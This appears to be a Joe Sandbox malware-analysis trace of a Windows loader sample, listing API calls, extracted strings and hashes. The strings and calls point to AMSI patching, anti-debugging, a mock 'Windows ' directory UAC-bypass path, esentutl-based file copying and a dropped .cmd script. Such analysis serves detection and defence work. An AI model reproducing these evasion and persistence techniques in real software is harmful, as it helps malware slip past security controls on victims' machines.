                                                                              • Part of subcall function 0289F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0289F77D
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 0288C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029FB8B8,?,028A0751,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession), ref: 0288C37B
                                                                              • Part of subcall function 0289DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDAB
                                                                              • Part of subcall function 0289DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDDB
                                                                              • Part of subcall function 0289DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0289DDF0
                                                                              • Part of subcall function 0289DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0289DE1C
                                                                              • Part of subcall function 0289DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0289DE25
                                                                              • Part of subcall function 02887E80: GetFileAttributesA.KERNEL32(00000000,?,028A356F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,Initialize), ref: 02887E8B
                                                                              • Part of subcall function 02888048: CreateDirectoryA.KERNEL32(00000000,00000000,?,028A370D,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize,02907380,028AB7B8,ScanString,02907380,028AB7B8), ref: 02888055
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                             • String ID: /d $ /o$.url$8gkD$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                            • API String ID: 297057983-2209947385
                                                                            • Opcode ID: 5db27fdaa370ac8bd8712d221169b29c5ad528f327b34ae0f3f0b3ac79695c90
                                                                            • Instruction ID: 3132ff2f68fee6027e1a0a510e88853693440e5c8ad7dddcaad6b92c029220ff
                                                                            • Opcode Fuzzy Hash: 5db27fdaa370ac8bd8712d221169b29c5ad528f327b34ae0f3f0b3ac79695c90
                                                                            • Instruction Fuzzy Hash: 41141B3EA0411E8FEB50FB68DC90ADE73B6AF99704F1040E1A009EB615DE71AE55CF46
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 0289DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                              • Part of subcall function 0289DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                              • Part of subcall function 0289DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                              • Part of subcall function 0289DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                            • Sleep.KERNEL32(000003E8,ScanBuffer,02907380,028AB7B8,UacScan,02907380,028AB7B8,ScanString,02907380,028AB7B8,028ABB30,00000000,00000000,028ABB24,00000000,00000000), ref: 028A40CB
                                                                              • Part of subcall function 028988B8: LoadLibraryW.KERNEL32(amsi), ref: 028988C1
                                                                              • Part of subcall function 028988B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02898920
                                                                            • Sleep.KERNEL32(000003E8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,000003E8,ScanBuffer,02907380,028AB7B8,UacScan,02907380), ref: 028A4277
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • Sleep.KERNEL32(00004E20,UacScan,02907380,028AB7B8,ScanString,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacInitialize,02907380,028AB7B8), ref: 028A50EE
                                                                              • Part of subcall function 0289DC04: RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                              • Part of subcall function 0289DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                              • Part of subcall function 0289DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 028985BC: WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                            • String ID: /d $ /o$.url$8gkD$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                            • API String ID: 2171786310-3836550919
                                                                            • Opcode ID: e61033d478b9bbc749006ae51b88b3a4fb62cd4d379b745bce25de4c33d49f37
                                                                            • Instruction ID: bcfb07cf90cb0234e1322f194dd0af082b4f0b90bc5bdda0fdec4081c9c133a3
                                                                            • Opcode Fuzzy Hash: e61033d478b9bbc749006ae51b88b3a4fb62cd4d379b745bce25de4c33d49f37
                                                                            • Instruction Fuzzy Hash: DD430E3EA0415E8FEB60FB68DC90A9E73B6BF99704F1040E29009E7615DE71AE45CF46

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C,OpenSession,02907380), ref: 0289ED6E
                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C,OpenSession), ref: 0289ED76
                                                                            • CloseHandle.KERNEL32(00000BF8,00000000,00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C), ref: 0289ED7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                            • String ID: )"C:\Users\Public\Libraries\rlyzsazB.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                            • API String ID: 3475578485-3692822684
                                                                            • Opcode ID: d32ee8540af80b3430bf3409d6735b1768bf75d2545b71d4006e96722019deb0
                                                                            • Instruction ID: 9edcfc509e4fe9e3b22ec31fc12d8b56a045ae9e24c7738a646853ad271568f5
                                                                            • Opcode Fuzzy Hash: d32ee8540af80b3430bf3409d6735b1768bf75d2545b71d4006e96722019deb0
                                                                            • Instruction Fuzzy Hash: 5822EC3DA0015E9FEF50FB68D881B8EB7B6AF85700F1440E2A004EB655EB74AE458F57

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,02881FC1), ref: 028817D0
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,02881FC1), ref: 028817E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 27994fa39659134bb2396ecdf6de2f0edd4f3a42ec8522f4a17ed2392e9f7384
                                                                            • Instruction ID: fde3dd6d73d0fff800443d23d9dc029b8fdf6ea530edde0b27fbe01eeae4a645
                                                                            • Opcode Fuzzy Hash: 27994fa39659134bb2396ecdf6de2f0edd4f3a42ec8522f4a17ed2392e9f7384
                                                                            • Instruction Fuzzy Hash: 64B1337EA052458FCB15EF2CD8C8325BBE1EB85315F0986ADD54DCB389CB30A462CB91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(amsi), ref: 028988C1
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02898920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                            • String ID: DllGetClassObject$W$amsi
                                                                            • API String ID: 941070894-2671292670
                                                                            • Opcode ID: 65e204762731c7213398d2eef654dd922ef971491efd381d7981cd6f9fca815f
                                                                            • Instruction ID: 9a5cf80c4c9737c1477c78d8e318db0445ec12edcaec538003c275367d11080d
                                                                            • Opcode Fuzzy Hash: 65e204762731c7213398d2eef654dd922ef971491efd381d7981cd6f9fca815f
                                                                            • Instruction Fuzzy Hash: 13F0A4A854C381BEE700E2788C45F4FBECD4B62264F088A18B1E8DA2D2D679D1048767

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,02881FE4), ref: 02881B17
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02881FE4), ref: 02881B31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 768c7886af5f5004e602483883b882987819b4ba629de32a504cee76c8cffae3
                                                                            • Instruction ID: ff62cdbccad29690d409e2c508c55aedbc3609089ad8139d93da700678a6fd4a
                                                                            • Opcode Fuzzy Hash: 768c7886af5f5004e602483883b882987819b4ba629de32a504cee76c8cffae3
                                                                            • Instruction Fuzzy Hash: CD51227D6042408FD715EF6CC9C8766BBE4AF46318F1885AED54CCB286EB70D846CB92

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0289E5F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CheckConnectionInternet
                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                            • API String ID: 3847983778-3852638603
                                                                            • Opcode ID: 643d1f16b219a1c076c1d2d184a227f04de0351d40a6cb413758429fa47a2ef0
                                                                            • Instruction ID: bdad91cd670530ece60288fa8cbad5ef476e2977af199f9aff9a17893ced106e
                                                                            • Opcode Fuzzy Hash: 643d1f16b219a1c076c1d2d184a227f04de0351d40a6cb413758429fa47a2ef0
                                                                            • Instruction Fuzzy Hash: 50410F3EB0010DABEF11FBA8D841ADE77BAEF88700F144466E041E7652EA75AD05CF56

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                            • String ID: CreateProcessAsUserW$Kernel32
                                                                            • API String ID: 3130163322-2353454454
                                                                            • Opcode ID: eebe99d9c638d123fd204e8677ff9d02bb100413c7cd47ee26b035a42e5d65ad
                                                                            • Instruction ID: bb21aa8e4fec1b53636b69d669adc9c789323bf4d244ff9c91b99d49b56161d7
                                                                            • Opcode Fuzzy Hash: eebe99d9c638d123fd204e8677ff9d02bb100413c7cd47ee26b035a42e5d65ad
                                                                            • Instruction Fuzzy Hash: 2F11C2BA644249AFEB40EFACDC81F9A77EDEB0D750F554450BA08E3640D634F9108B25
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                            • String ID: Kernel32$WinExec
                                                                            • API String ID: 2292790416-3609268280
                                                                            • Opcode ID: 4b62fab746f1aaff07f5088ce48fa00819a19f1cd257d122386b15b28d58f5e8
                                                                            • Instruction ID: 19596d76899d613f22588a86cdf25a07721d9c53312a9bd3e5d482b547d8a02e
                                                                            • Opcode Fuzzy Hash: 4b62fab746f1aaff07f5088ce48fa00819a19f1cd257d122386b15b28d58f5e8
                                                                            • Instruction Fuzzy Hash: F4016D7D68420ABFEB11EAE8EC45B6E77E9EB0A710F504460B900D6640E674BD108A26
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                            • String ID: Kernel32$WinExec
                                                                            • API String ID: 2292790416-3609268280
                                                                            • Opcode ID: 226bfd77ec3c2bc11848353285ff331f242d90310e06488a3ee1e8edb6faf154
                                                                            • Instruction ID: 5daa6105d1368275c4add68509ae4b0eff62558b8b9cd3b4eec445186cc353c6
                                                                            • Opcode Fuzzy Hash: 226bfd77ec3c2bc11848353285ff331f242d90310e06488a3ee1e8edb6faf154
                                                                            • Instruction Fuzzy Hash: 0EF0817D68430ABFEF11EBE8EC45F5E77EDEB0A710F504460B900D6640E674BD108A26
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02895D74,?,?,02893900,00000001), ref: 02895C88
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02895D74,?,?,02893900,00000001), ref: 02895CB6
                                                                              • Part of subcall function 02887D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02893900,02895CF6,00000000,02895D74,?,?,02893900), ref: 02887DAA
                                                                              • Part of subcall function 02887F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02893900,02895D11,00000000,02895D74,?,?,02893900,00000001), ref: 02887FB7
                                                                            • GetLastError.KERNEL32(00000000,02895D74,?,?,02893900,00000001), ref: 02895D1B
